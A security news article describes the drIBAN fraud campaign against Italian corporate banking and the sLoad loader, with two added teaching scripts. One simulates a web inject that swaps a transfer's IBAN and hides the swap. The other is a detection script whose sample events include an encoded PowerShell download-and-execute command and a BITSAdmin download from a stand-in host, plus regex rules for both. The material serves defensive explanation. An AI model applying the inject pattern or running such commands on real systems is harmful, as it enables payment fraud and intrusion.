
Italian Corporate Banking Customers Are Being Targeted by Hackers Using the New Web-Inject Toolkit drIBAN


By Esme Greene

Jun 28, 2023

According to Cleafy researchers Federico Valentini and Alessandro Strino, the primary objective of drIBAN fraud operations is to infect Windows workstations inside businesses and then alter legitimate bank transfers made by the victims, changing the beneficiary so that the money is routed to an account controlled by the attackers.

Web injects are a well-established technique in which cybercriminals insert their own scripts into legitimate websites through a man-in-the-browser (MitB) attack. Because the injected code runs inside the victim's browser, after TLS has been terminated, it can read and modify the traffic between the browser and the bank's server both before the page is displayed and before a request is sent.

Fraud Operations

The fraudulent transactions are frequently carried out using a technique known as an Automated Transfer System (ATS), which can bypass the anti-fraud controls deployed by banks and initiate unauthorized wire transfers directly from the victim's computer, so the activity originates from a trusted device and an already-authenticated session.
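The two mechanisms above, the web inject that rewrites a transfer in flight and the fact that the bank sees a transfer coming from the victim's own session, are easier to reason about in code. The following is an added example written for this article, not drIBAN's code and not Cleafy's detection logic. The "bank", the browser transport, the field names, the endpoint and both IBANs are constructed for the illustration; a real inject patches `XMLHttpRequest.prototype.send` or `window.fetch` in the page, which the stand-in `browser.send` stands in for. A full ATS would go one step further and initiate transfers on its own rather than waiting for the victim to submit one.

```javascript
// Added illustration (not drIBAN's code): a minimal man-in-the-browser
// web inject that swaps the beneficiary IBAN of an outgoing transfer and
// hides the swap from the victim, plus a server-side check that does not
// trust anything the browser displayed. Field names, IBANs, the endpoint
// and the "bank" are all constructed for this example.

const LEGIT_IBAN = "IT60X0542811101000000123456"; // constructed sample
const MULE_IBAN  = "IT12A0300203280000000000999"; // constructed sample

// Simulated bank backend: records what it actually receives.
function makeBank() {
  return {
    ledger: [],                                 // transfers as received
    knownBeneficiaries: new Set([LEGIT_IBAN]),  // beneficiaries paid before
    handle(path, payload) {
      if (path !== "/api/transfer") return { status: 404 };
      this.ledger.push({ ...payload });
      return { status: 200, confirmation: { ...payload } };
    },
  };
}

// Simulated browser transport (stand-in for XMLHttpRequest.send / fetch).
function makeBrowser(bank) {
  return { send: (path, body) => bank.handle(path, JSON.parse(body)) };
}

// The web inject. Real injects patch XMLHttpRequest.prototype.send or
// window.fetch in the page; this does the same to the stand-in transport.
function installWebInject(browser, muleIban) {
  const originalSend = browser.send;
  browser.send = (path, body) => {
    if (!path.endsWith("/transfer")) return originalSend(path, body);
    const payload = JSON.parse(body);
    const ibanTheVictimTyped = payload.beneficiaryIban;
    payload.beneficiaryIban = muleIban;                 // what the bank receives
    const resp = originalSend(path, JSON.stringify(payload));
    if (resp.confirmation) {                            // what the victim sees
      resp.confirmation.beneficiaryIban = ibanTheVictimTyped;
    }
    return resp;
  };
}

// The bank's own page logic, unaware that the transport has been hooked.
function submitTransfer(browser, form) {
  return browser.send("/api/transfer", JSON.stringify(form)).confirmation;
}

// Server-side check (a generic anti-fraud heuristic assumed here, not
// Cleafy's detection logic): a first-time beneficiary must be confirmed
// out of band, on a channel the infected browser cannot rewrite.
function needsOutOfBandConfirmation(bank, transfer) {
  return !bank.knownBeneficiaries.has(transfer.beneficiaryIban);
}

function runScenario() {
  const bank = makeBank();
  const browser = makeBrowser(bank);
  installWebInject(browser, MULE_IBAN);

  const form = { beneficiaryName: "ACME Srl", beneficiaryIban: LEGIT_IBAN, amount: "12500.00" };
  const shownToVictim = submitTransfer(browser, form);
  const receivedByBank = bank.ledger[0];
  return {
    shownIban: shownToVictim.beneficiaryIban,      // unchanged: victim sees nothing wrong
    receivedIban: receivedByBank.beneficiaryIban,  // mule account: bank pays the wrong party
    flagged: needsOutOfBandConfirmation(bank, receivedByBank),
  };
}

console.log(runScenario());
```

Running the scenario shows the point of the attack: the confirmation the victim sees still carries the IBAN they typed, while the bank's ledger carries the mule account, and every request came from the victim's authenticated session. That is why any control that relies on what the browser displays (or on the browser being honest about the request it sent) is blind here, and why the confirmation of a new beneficiary has to happen on a channel the compromised workstation does not control.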

According to Cleafy, 2021 marked the evolution of the traditional "banking trojan" activity into an advanced persistent threat. Further evidence suggests that the activity cluster overlaps with a 2018 campaign run by an actor tracked by Proofpoint as TA554, which targeted users in Canada, Italy, and the United Kingdom.

Technical Aspects

The malware loader sLoad uses PowerShell to collect and exfiltrate information about infected systems. Its main purpose is to profile the victim and determine whether it is lucrative enough to justify a heavier payload, such as the Ramnit banking trojan.

By abusing legitimate Windows components such as PowerShell and BITSAdmin, sLoad relies on living-off-the-land (LotL) techniques to avoid detection. The malware can also check the compromised workstation against a predefined list of corporate banking institutions to determine whether it is one of the intended targets; if so, sLoad proceeds with the infection.
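Because the binaries sLoad abuses are signed Microsoft tools, detection has to key on how they are used rather than on the tools themselves. The following is an added example written for this article, not sLoad's code and not Cleafy's detection logic: it triages process-creation records for the LotL pattern described above, PowerShell launched hidden with an encoded command from a script host, and BITSAdmin used to pull a file. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the events, paths, URLs and the encoded script are constructed, and the regexes match only the common abbreviations of the PowerShell switches (PowerShell accepts any unambiguous prefix of `-EncodedCommand`, so production rules need to be broader).

```javascript
// Added illustration (not sLoad's code and not Cleafy's detection logic):
// triage of process-creation records for the living-off-the-land pattern
// described above, i.e. PowerShell launched hidden with an encoded command
// and BITSAdmin used to fetch a payload. Field names follow Sysmon
// Event ID 1 (Image, ParentImage, CommandLine); the events, paths, URLs
// and the encoded command are all constructed for this example.

// PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
const STAGE_TWO_SCRIPT =
  "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')";
const ENCODED = Buffer.from(STAGE_TWO_SCRIPT, "utf16le").toString("base64");

// Constructed sample events: two malicious, two benign.
const SAMPLE_EVENTS = [
  {
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parentImage: "C:\\Windows\\System32\\wscript.exe",
    commandLine: `powershell.exe -nop -w hidden -enc ${ENCODED}`,
  },
  {
    image: "C:\\Windows\\System32\\bitsadmin.exe",
    parentImage: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine:
      "bitsadmin.exe /transfer job1 /download /priority normal " +
      "http://example.invalid/x.bin C:\\Users\\Public\\x.bin",
  },
  {
    image: "C:\\Windows\\System32\\svchost.exe",
    parentImage: "C:\\Windows\\System32\\services.exe",
    commandLine: "svchost.exe -k netsvcs",
  },
  {
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    parentImage: "C:\\Windows\\explorer.exe",
    commandLine: "powershell.exe -File C:\\scripts\\inventory.ps1", // routine admin use
  },
];

const isPowerShell = (p) => /\\powershell\.exe$/i.test(p);
// Common abbreviations of -EncodedCommand followed by the base64 blob.
const ENC_FLAG = /(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+\/=]+)/i;

// Each rule keys on how a legitimate tool is used, not on the tool itself.
const RULES = [
  { name: "powershell-encoded-command",
    match: (e) => isPowerShell(e.image) && ENC_FLAG.test(e.commandLine) },
  { name: "powershell-hidden-window",
    match: (e) => isPowerShell(e.image) && /(?:^|\s)-w(?:indowstyle)?\s+hidden\b/i.test(e.commandLine) },
  { name: "script-host-spawns-powershell",
    match: (e) => isPowerShell(e.image) && /\\(?:wscript|cscript|mshta)\.exe$/i.test(e.parentImage) },
  { name: "bitsadmin-download",
    match: (e) => /\\bitsadmin\.exe$/i.test(e.image) && /\/(?:transfer|download|addfile)\b/i.test(e.commandLine) },
  { name: "bitsadmin-from-powershell",
    match: (e) => /\\bitsadmin\.exe$/i.test(e.image) && isPowerShell(e.parentImage) },
];

// Recover the script hidden behind -EncodedCommand so an analyst can read it.
function decodeEncodedCommand(commandLine) {
  const m = ENC_FLAG.exec(commandLine);
  return m ? Buffer.from(m[1], "base64").toString("utf16le") : null;
}

// For every event, return the rules it trips and the decoded command, if any.
function triage(events) {
  return events.map((e) => ({
    image: e.image,
    hits: RULES.filter((r) => r.match(e)).map((r) => r.name),
    decodedCommand: isPowerShell(e.image) ? decodeEncodedCommand(e.commandLine) : null,
  }));
}

for (const result of triage(SAMPLE_EVENTS)) {
  if (result.hits.length) console.log(result);
}
```

The benign PowerShell event (an inventory script run from Explorer) trips nothing, while the hidden, encoded launch from wscript.exe and the BITSAdmin download spawned by PowerShell each trip several rules, and the decoded command exposes the download-and-execute stage that the base64 was hiding. Decoding the command rather than alerting on the encoding alone is what lets an analyst tell a staged loader from an administrator's harmless one-liner.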

Cybersecurity Measures

sLoad is particularly hard to detect and defend against because its evasion strategy relies on PowerShell and other legitimate Windows programs rather than on custom binaries that antivirus signatures could match. Detection therefore has to focus on how those tools are used, for example PowerShell launched with a hidden window and an encoded command, or BITS jobs downloading executables from unfamiliar hosts, rather than on the tools themselves. Strong security practices and routine software updates to fix known vulnerabilities are preventative steps organizations can take to reduce the likelihood of an sLoad infection.
